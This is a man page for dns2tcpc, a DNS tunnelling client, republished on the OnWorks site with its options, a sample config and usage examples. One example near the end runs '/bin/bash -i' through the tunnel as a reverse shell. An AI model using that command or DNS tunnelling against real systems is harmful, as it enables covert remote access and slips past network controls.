OnWorks favicon

dns2tcpc - Online in the Cloud

Run dns2tcpc in OnWorks free hosting provider over Ubuntu Online, Fedora Online, Windows online emulator or MAC OS online emulator

This is the command dns2tcpc that can be run in the OnWorks free hosting provider using one of our multiple free online workstations such as Ubuntu Online, Fedora Online, Windows online emulator or MAC OS online emulator



dns2tcpc - A tunneling tool that encapsulate TCP traffic over DNS.


dns2tcpc [ -h ] [ -c ] [ -z domain zone ] [ -d debug_level ] [ -r resource ] [ -k key ] [
-f config_file ] [ -e command ] [ -T request type ] [ -l local_port ] [ server ]


dns2tcpc is a network tool used to encapsulate TCP communications in DNS. When connections
are received on a specific port all TCP traffic is sent to the remote dns2tcpd server and
forwarded to a specific host and port. Multiple connections are supported.

dns2tcpc was written for demonstration purposes.


-h Help Menu

-c Enable DNS compression. When used, be sure that all relay and DNS server support
compression and really use it.

-z domain zone
Use this domain as endpoint.

-d debug level
Change debug level. Levels available are 1, 2 or 3.

-r resource
Remote resource to access.

-k key Pre shared key used for authentication (identification).

-f config file
Configuration file to use.

-T request type
Request type to use. Actually only KEY and TXT requests are supported.

-e command
Command to execute, I/O are redirected in the tunnel.

-l local_port
Local port accepting incomming connections (or - for stdin on UNIX systems).

-t connection timeout
Maximum DNS server's answer delay in seconds. A valid delay is between 1 and 240
seconds. Default is 3.

server DNS server to use. The first entry in resolv.conf file will be choosen if the
server is not specified.


By default ${HOME}/.dns2tcprc is used if no configuration file is specified. Here is an
example :

domain = dns2tcp.hsc.fr
resource = ssltunnel
local_port = 4430
enable_compression = 0
debug_level = 1
key = mykey
# DNS to use
server = ns.hsc.fr


dns2tcpc -k mykey -z dns2tcp.hsc.fr mydns

Ask the dns2tcp server to list available resources.

ssh -o 'ProxyCommand dns2tcpc -r ssh -l - -z dns2tcp.hsc.fr -k mykey mydns' myserver

Use dns2tcp as a proxy command with ssh. We try to connect to the ssh resource with
the key 'mykey' and the DNS mydns.

dns2tcpc -r socat-resource -e '/bin/bash -i' -k mykey -z dns2tcp.hsc.fr mydns

Use dns2tcp as a reverse shell, the remote shell will appear on the socat-resource.

dns2tcpc -d 1 -f /dev/null -r ssl-tunnel -l 2000 -k mykey -T KEY -z dns2tcp.hsc.fr mydns

Do not use the default configuration file, bind local port 2000 and forward all the
traffic on the remote ssl-tunnel resource, use the first debug level. Use KEY type
DNS requests.


Olivier Dembour <olivier.dembour@hsc.fr>

Use dns2tcpc online using onworks.net services